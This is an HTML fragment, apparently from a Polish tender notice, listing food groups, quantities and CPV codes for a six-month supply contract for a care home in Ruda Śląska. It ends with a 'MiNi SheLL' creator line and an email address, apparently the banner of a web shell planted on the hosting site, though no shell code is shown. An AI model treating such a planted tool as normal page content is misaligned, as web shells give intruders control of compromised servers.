5	Cebulka zielona,szczypiorek (VII-X)		kg	30,00
6	Cebulka zielona (XI-XII)		kg	15,00
7	Czosnek polski		kg	16,00
8	Kalafior - różyczka		kg	200,00
9	Kalarepa		kg	12,00
10	Kapusta biała		kg	350,00
11	Kapusta biała młoda		kg	200,00
12	Kapusta czerwona		kg	250,00
13	Kapusta czerwona młoda		kg	140,00
14	Kapusta kiszona		kg	420,00
15	Kapusta pekińska		kg	90,00
16	Kapusta włoska		kg	70,00
17	Kapusta włoska młoda		kg	20,00
18	Koperek zielony (VII-X)		kg	40,00
19	Koperek zielony (XI-XII)		kg	20,00
20	Ogórki kiszone		kg	100,00
21	Ogórki małosolne		kg	27,00
22	Ogórki zielone  (VII-X)		kg	120,00
23	Ogórki zielone (XI-XII)		kg	20,00
24	Papryka czerwona		kg	17,00
25	Pieczarki		kg	130,00
26	Pietruszka korzeń		kg	420,00
27	Pietruszka zielona  (VII-X)		kg	50,00
28	Pietruszka zielona  (XI-XII)		kg	25,00
29	Pomidory  (VII-X)		kg	250,00
30	Pomidory (XI-XII)		kg	100,00
31	Por		kg	100,00
32	Rzodkiewka  (VII-X)	100g	pęczek	60,00
33	Rzodkiewka (XI-XII)	100g	pęczek	20,00
34	Sałata zielona  (VII-X)	300g	szt	100,00
35	Sałata zielona (XI-XII)	200g	szt	3,00
36	Seler korzeń		kg	450,00
37	Marchew		kg	1300,00
38	Ziemniaki		kg	8500,00
39	Ziemniaki młode		kg	2000,00
40	Fasola kolorowa		kg	25,00
41	Fasola Jaś		kg	45,00
42	Fasolka szparagowa		kg	80,00
43	Groch łuszczony		kg	30,00
44	Pasternak		kg	1,00
45	Mak niebieski mielony		kg	10,00
46	Grzyby suszone		kg	3,00.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 03.20.00.00-3, 15.33.11.35-2.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 6.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 7 <b>NAZWA:</b> DOSTAWA OWOCÓW ŚWIEŻYCH I SUSZONYCH
DLA DOMU POMOCY SPOŁECZNEJ SENIOR W RUDZIE ŚLĄSKIEJ.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1	Arbuz	 	kg	400,00
2	Banany	200g/szt	kg	1000,00
3	Brzoskwinie	150g/szt	kg	130,00
4	Cytryny	 	kg	1,00
5	Czereśnie	 	kg	60,00
6	Grapefruity 	300-350g/szt	kg	120,00
7	Jabłka	 	kg	550,00
8	Jabłka deserowe 	200g/szt	kg	650,00
9	Jagody	 	kg	20,00
10	Morele deserowe	 	kg	75,00
11	Mandarynki	80-100g/szt	kg	250,00
12	Nektaryny	150g/szt	kg	50,00
13	Owoce kiwi 	100-120g/szt	kg	70,00
14	Pomarańcze 	200-250g/szt	kg	350,00
15	Truskawki 	 	kg	30,00
16	Śliwki	 	kg	380,00
17	Śliwki deserowe	 	kg	250,00
18	Winogrona deserowe ( VII - X )	 	kg	200,00
19	Winogrona deserowe ( XI - XII )	 	kg	10,00
20	Wiśnie	 	kg	70,00
21	Rabarbar	 	kg	80,00
22	Gruszki deserowe	200g/szt	kg	100,00
23	Gruszki suszone	 	kg	3,00
24	Śliwki suszone bez pestek		kg	7,00
25	Jabłka suszone		kg	3,00.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 03.20.00.00-3, 15.66.24.10-1.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 6.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 8 <b>NAZWA:</b> DOSTAWA WARZYW I OWOCÓW MROŻONYCH
DLA DOMU POMOCY SPOŁECZNEJ SENIOR W RUDZIE ŚLĄSKIEJ.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1	Brokuły 	450g	kg	5,00
2	Brokuły 	2000-2500g	kg	60,00
3	Brukselka	450g	kg	5,00
4	Brukselka	2000-2500g	kg	35,00
5	Kalafior	450g	kg	5,00
6	Kalafior	2000-2500g	kg	65,00
7	Mieszanka kompotowa 
(wiśnia, aronia, czarna porzeczka, 
śliwka, truskawka)	450g	kg	20,00
8	Mieszanka kompotowa 
(wiśnia, aronia, czarna porzeczka, 
śliwka, truskawka)	2000-2500g	kg	550,00
9	Szpinak	450g	kg	10,00
10	Szpinak	2000-2500g	kg	150,00
11	Truskawki	450g	kg	5,00
12	Truskawki	2000-2500g	kg	35,00.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.33.00.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 6.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 9 <b>NAZWA:</b> DOSTAWA RYB MROŻONYCH, ŚWIEŻYCH, WĘDZONYCH I PRZETWORÓW RYBNYCH
DLA DOMU POMOCY SPOŁECZNEJ SENIOR W RUDZIE ŚLĄSKIEJ.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1	Filety z zielonego śledzia	 	kg	90,00
2	Filety z tilapii b/s, zawartość glazury 25%	 	kg	80,00
3	Filet z morszczuka, b/s, płaty SHP	 	kg	50,00
4	Filety z dorsza płaty b/skóry ,SHP	 	kg	40,00
5	Filet z pangi trymowanej płaty,SHP	 	kg	270,00
6	Filety z matiasa b/skóry solone	1000-4000g	kg	90,00
7	Filety z matiasa b/skóry solone	100-900g	kg	10,00
8	Filety śledziowe w oleju z różnymi dodatkami (masa netto bez zalewy)	1000-4000g	kg	30,00
9	Filety śledziowe w oleju z różnymi dodatkami (masa netto bez zalewy)	100-900g	kg	10,00
10	Sałatka z filetów śledziowych w majonezie 	1000-4000g	kg	45,00
11	Sałatka z filetów śledziowych w majonezie 	100-900g	kg	5,00
12	Sałatka-krajanka z filetów śledziowych w oleju                  z różnymi dodatkami (masa netto bez zalewy)	1000-4000g	kg	40,00
13	Sałatka-krajanka z filetów śledziowych w oleju                                   z różnymi dodatkami (masa netto bez zalewy)	100-900g	kg	10,00
14	Koreczki śledziowe z różnymi dodatkami (masa netto bez zalewy)	1000-4000g	kg	25,00
15	Koreczki śledziowe z różnymi dodatkami (masa netto bez zalewy)	100-900g	kg	5,00
16	Klopsy rybne opiekane w zalewie (masa netto bez zalewy)	1000-4000g	kg	25,00
17	Klopsy rybne opiekane w zalewie (masa netto bez zalewy)	100-900g	kg	10,00
18	Pasty rybne(z makreli, tuńczyka, łososia itp.) 	1000-4000g	kg	35,00
19	Pasty rybne(z makreli, tuńczyka, łososia itp.) 	50-500g	kg	10,00
20	Płaty śledziowe marynowane (masa netto bez zalewy)	1000-4000	kg	50,00
21	Płaty śledziowe marynowane (masa netto bez zalewy)	100-900g	kg	5,00
22	Makrela wędzona ( tusze)	 	kg	220,00
23	Szproty wędzone	 	kg	10,00
24	Paprykarz *	100-400g	kg	50,00
25	Szproty w oleju                     	150-200g	kg	50,00
26	Tuńczyk w oleju - kawałki	150-200g	kg	30,00
27	Śledzie w oleju  o zawartości                                          60% mięsa rybnego                  	150-200g	kg	30,00
28	Śledzie w pomidorach  o zawartości                                 50% mięsa rybnego                   	150-200g	kg	30,00
29	Filet z karpia świeży	 	kg	40,00
30	Ryba w galarecie	150-200g	kg	35,00.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.20.00.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 6.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 10 <b>NAZWA:</b> DOSTAWA MIĘSA WIEPRZOWEGO I WOŁOWEGO ORAZ PODROBÓW
DLA DOMU POMOCY SPOŁECZNEJ SENIOR W RUDZIE ŚLĄSKIEJ.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1	Boczek wp. bez kości - świeży	kg	5,00
2	Flaki wołowe parzone cięte 	kg	50,00
3	Karczek wp. bez kości - świeży	kg	40,00
4	Łopatka wp. bez kości - świeża	kg	850,00
5	Mięso mielone wieprzowo-wołowe - świeże	kg	20,00
6	Nóżki wieprzowe - świeże	kg	60,00
7	Ozory wieprzowe - świeże	kg	70,00
8	Płuca wieprzowe - świeże	kg	40,00
9	Schab wp. bez kości - świeży	kg	240,00
10	Słonina mielona - świeża	kg	35,00
11	Wołowe - extra bez kości - świeże	kg	25,00
12	Wołowe z kością - antrykot, świeże	kg	160,00
13	Żeberka wieprzowe extra mięsne, paski - świeże	kg	100,00.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.11.00.00-2.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 6.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 11 <b>NAZWA:</b> DOSTAWA MIĘSA I PODROBÓW DROBIOWYCH 
DLA DOMU POMOCY SPOŁECZNEJ SENIOR W RUDZIE ŚLĄSKIEJ.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1	Kurczaki świeże	1300 - 1700g	kg	150,00
2	Porcje rosołowe mrożone paczkowane 	500 - 2000g	kg	350,00
3	Serca z indyka - świeże 	 	kg	35,00
4	Udka z kurczaka - ćwiartki świeże 	350 - 400g	kg	70,00
5	Wątróbka z kurczaka - świeża 	 	kg	70,00
6	Żołądki z indyka - świeże 	 	kg	55,00
7	Filety z kurczaka świeże	 	kg	110,00
8	Filety z indyka świeże	 	kg	25,00
9	Podudzie z kurczaka świeże 	150 - 180g	kg	320,00
10	Filet z udźca z kurczaka b/skóry-  świeży	100 - 160g	kg	130,00
11	Filet z udźca z kurczaka ze skórą - świeży	120 - 180g	kg	155,00
12	Udziec z kurczaka z kością świeży 	150 - 180g	kg	30,00.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.11.00.00-2.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 6.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 12 <b>NAZWA:</b> DOSTAWA WĘDLIN
DLA DOMU POMOCY SPOŁECZNEJ SENIOR W RUDZIE ŚLĄSKIEJ.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1	Baleron wieprzowy gotowany (zawartość mięsa wieprzowego min. 80% )		kg	70,0
2	Blok drobiowy grubo rozdrobniony (zawartość mięsa drobiowy min. 70% )		kg	95,0
3	Blok wieprzowy grubo rozdrobniony (zawartość mięsa wieprzowego min. 70% )		kg	130,0
4	Boczek rolowany faszerowany ( zawartość mięsa 70%)		kg	75,0
5	Boczek wędzony-surowy, paski, bez kości		kg	180,0
6	Filet  z indyka wędzony, pieczony-płat (mięso z indyka nierozdrobnione min.95%)		kg	50,0
7	Kiełbasa wieprzowa biała  parzona średnio rozdrobniona (zawartość mięsa min.75%)		kg	120,0
8	Kiełbasa wieprzowa podsuszana  grubo rozdrobniona - kanapkowa, np. żywiecka, krakowska, oławska itp.(zawartość mięsa min.80%)		kg	120,0
9	Kiełbasa wieprzowa parówkowa drobno rozdrobniona (zawartość mięsa min.70%)		kg	250,0
10	Kiełbasa wieprzowa surowa wędzona średnio rozdrobniona (zawartość mięsa min.80% )		kg	40,0
11	Kiełbasa wieprzowa swojska wędzona, pieczona -cienka, średnio rozdrobniona    (zawartość mięsa min.80% )		kg	180
12	Kiełbasa wieprzowa parzona grubo rozdrobniona - kanapkowa, np. krakowska, kminkowa, dębicka itp.(zawartość mięsa min.80%)		kg	130,0
13	Kiełbasa wieprzowa szynkowa grubo rozdrobniona (zawartość mięsa min.80%)		kg	95,0
14	Kiełbasa śląska drobiowa średnio rozdrobniona (zawartość mięsa min.70%)		kg	140,0
15	Kiełbasa śląska wieprzowa średnio rozdrobniona (zawartość mięsa min.70%)		kg	130,0
16	Kiełbasa toruńska średnio rozdrobniona (zawartość mięsa min.70%)		kg	85,0
17	Kiełbasa wieprzowa głogowska średnio rozdrobniona (zawartość mięsa min.80%)		kg	50,0
18	Kiełbasa zwyczajna średnio rozdrobniona (zawartość mięsa min.60%)		kg	150,0
19	Kiełbaski wieprzowe z serem średnio rozdrobnione, cienkie ( zawartość mięsa min.70% )		kg	55,0
20	Krupnioki śląskie		kg	80,0
21	Bułczanka		kg	50,0
22	Metka podwędzana grubo rozdrobniona		kg	70,0
23	Metka smakowa średnio rozdrobniona, np.cebulowa, tatarska, łososiowa itp.		kg	70,0
24	Mielonka drobiowa średnio rozdrobniona (zawartość mięsa min. 70%)		kg	50,0
25	Mielonka wieprzowa średnio rozdrobniona (zawartość mięsa min. 70%)		kg	65,0
26	Mortadela wieprzowa drobno rozdrobniona (zawartość mięsa min. 70%)		kg	130,0
27	Ogonówka parzona  ( zawartość mięsa min. 80%)		kg	150,0
28	Parówki  drobiowe drobno rozdrobnione (zawartość mięsa min. 70%)		kg	280,0
29	Parówki wieprzowe śląskie średnio rozdrobnione (zawartość mięsa min. 70%)		kg	240,0
30	Pasztetowa drobiowa		kg	30,0
31	Pasztetowa wieprzowa popularna		kg	55,0
32	Pasztetowa wieprzowa podwędzana		kg	55,0
33	Polędwica sopocka (zawartość mięsa min.80%)		kg	95,0
34	Polędwica z indyka średnio rozdrobniona (zawartość mięsa min.70%)		kg	50,0
35	Rolada drobiowa faszerowana (zawartość mięsa min. 70%)		kg	120,0
36	Salami wieprzowe, szlachetne drobno rozdrobnione (zawartość mięsa min. 80%)		kg	20,0
37	Salceson drobiowy grubo rozdrobniony (zawartość mięsa min. 40% )		kg	70,0
38	Salceson ozorkowy grubo rozdrobniony (zawartość podrobów wieprzowych min. 51%, w tym ozory 35% )		kg	70,0
39	Szynka drobiowa z kurczaka grubo rozdrobniona (zawartość mięsa min.70% )		kg	80,0
40	Szynka wieprzowa gotowana (zawartość mięsa min. 80%)		kg	65,0
41	Szynka wieprzowa parzona konserwowa (zawartość mięsa min. 75%)		kg	85,0
42	Indyk w galarecie (zawartość mięsa min. 50%)		kg	70,0
43	Szynka wieprzowa tradycyjna, np.wiejska, swojska, itp. (zawartość mięsa min. 85%)		kg	55,0.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.13.11.00-6.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 6.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 13 <b>NAZWA:</b> DOSTAWA JAJ KURZYCH
DLA DOMU POMOCY SPOŁECZNEJ SENIOR W RUDZIE ŚLĄSKIEJ.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1	Jaja kurze 	63g-73g (L)	szt.	17000.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 03.14.25.00-3.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 6.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 14 <b>NAZWA:</b> DOSTAWA CZEKOLAD I WYROBÓW CUKIERNICZYCH
DLA DOMU POMOCY SPOŁECZNEJ SENIOR W RUDZIE ŚLĄSKIEJ.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1	Biszkopty	100 - 500g	kg	10,00
2	Biszkopty	1000 - 3000g	kg	50,00
3	Bombonierka - czekoladki nadziewane 	100-200g	kg	13,00
4	Cukierki czekoladowe (nadzienie kakaowe, orzechowe, rumowe,np. michałki itp.)	 	kg	10,00
5	Ciastka maślane 	800-2500g	kg	20,00
6	Ciastka deserowe-kakaowe,                             z cukrem, z kokosem itp.	800-2500g	kg	25,00
7	Ciastka deserowe oblewane czekoladą	800-2500g	kg	15,00
8	Ciasteczka deserowe z nadzieniem owocowym, kremowym	800-2500g	kg	15,00
9	Pierniki nadziewane w czekoladzie	800-2500g	kg	12,00
10	Biszkopty z galaretką w czekoladzie	800-1000g	kg	12,00
11	Galaretka w czekoladzie	 	kg	10,00
12	Praliny nadziewane        (min.40%masy kakaowej)		kg	6,00
13	Czekolada mleczna (min.30%masy kakaowej)	100g	szt	70,00
14	Ciastka bez dodatku cukru	70-150g	kg	20,00
15	Wafelki bez dodatku cukru	70-150g	kg	4,00
16	Mieszanka czekoladowa-opakowanie świąteczne	200-300g	kg	45,00
17	Wafelki z kremem kakaowym (min32%) w czekoladzie deserowej (min.47%)	200-250g	kg	35,00
18	Pierniczki w czekoladzie (min 15%)    z nadzieniem owocowym (min 29%)	150-200g	kg	60,00
19	Biszkopty z galaretką w czekoladzie (min 15% czekolady)	120 - 150g	kg	22,00
20	Czekolada mleczna nadziewana - świąteczna (min.30%masy kakaowej)	100g	szt	150,00
21	Czekolada mleczna, deserowa bez dodatku cukru	100g	szt	80,00
22	Mikołaj świąteczny z czekolady mlecznej(min.30%
masy kakaowej)	60 -100g	kg	18,00.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.84.00.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 6.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 15 <b>NAZWA:</b> DOSTAWA NAPOJÓW BEZALKOHOLOWYCH
DLA DOMU POMOCY SPOŁECZNEJ SENIOR W RUDZIE ŚLĄSKIEJ.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1	Napoje owocowe pasteryzowane niegazowane min. 25% soku 	1000 - 2000ml	l	300,00
2	Soczki owocowo-warzywne 100%, przecierowe 	250 - 330ml	l	220,00
3	Soki owocowo - warzywne 100%, przecierowe 	750 - 1000ml	l	350,00
4	Sok wysokosłodzony - naturalny zagęszczony	330 - 500ml	l	30,00
5	Woda mineralna gazowana, niegazowana 	1500ml	szt	12,00
6	Piwo ciemne bezalkoholowe	400 - 500ml	l	4,00
7	Soki owocowe 100% 	1000ml	l	35,00.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.98.00.00-1.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 6.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com